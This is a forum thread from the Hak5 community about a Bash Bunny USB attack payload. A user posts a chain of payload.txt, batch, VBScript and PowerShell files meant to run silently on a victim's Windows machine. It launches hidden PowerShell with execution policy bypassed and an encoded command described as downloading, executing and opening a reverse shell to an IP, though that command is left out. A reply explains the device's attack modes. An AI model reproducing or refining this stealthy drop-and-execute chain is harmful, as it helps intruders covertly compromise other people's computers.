Hak5 Forums
Babutzc

ATTACKMODE question / confusion


There is something I do not understand while working with the BB. I am trying to make a payload as silent as possible, and I'm sure I'm doing some stuff which isn't really necessary.
The payload down below only works when it's in ATTACKMODE HID STORAGE. In any other ATTACKMODE, it fails to download my file and start a reverse shell.

I do not understand why this is; does anyone have a clarification for me? Because I really fail to understand why.
Also, I'm sure I could spawn a reverse shell with a .exe created by unicorn.

payload.txt

GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID SERIAL
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
LED FINISH


d.cmd

@echo off
REM %~dp0 already ends in a backslash, so do not add another one;
REM quote the path in case the mount point ever contains spaces
cscript //nologo "%~dp0i.vbs"
@exit


i.vbs

' %~dp0 is a batch construct and never expands inside VBScript, so derive
' the payload folder from this script's own path instead
Set fso = CreateObject("Scripting.FileSystemObject")
folder = fso.GetParentFolderName(WScript.ScriptFullName)
command = "powershell.exe -nologo -WindowStyle hidden -ExecutionPolicy Bypass -File """ & folder & "\shell.ps1"""
Set shell = CreateObject("WScript.Shell")
shell.Run command, 0   ' 0 = no window; Run returns immediately


shell.ps1

powershell.exe -nologo -WindowStyle Hidden -encodedCommand <<base64 string with ip and download/execute instructions>>



SERIAL attackmode puts the Bunny in serial mode, like a COM port. The original payload you posted looks for the Bunny to be mounted as a USB stick (STORAGE). If it is not mounted as storage, there is no drive labeled BASHBUNNY. The only way you will get the files you are accessing with SERIAL is to do it serially. You pretty much have to make a serial server on the Bash Bunny in Python or whatever to serve/communicate/etc., and a serial receiver agent on the victim to receive it and run it. Do not ask how to do it the serial way I mentioned; it is a long topic best self-journeyed to understand, and it involves programming.

So, HID puts the BB in keyboard mode, STORAGE puts the BB in USB storage mode, ECM_ETHERNET puts the BB in network mode as an ECM-compatible network device (mostly Macs and Linux machines), and RNDIS_ETHERNET puts the BB in network mode as an RNDIS-driver-compatible device (mainly Windows machines).

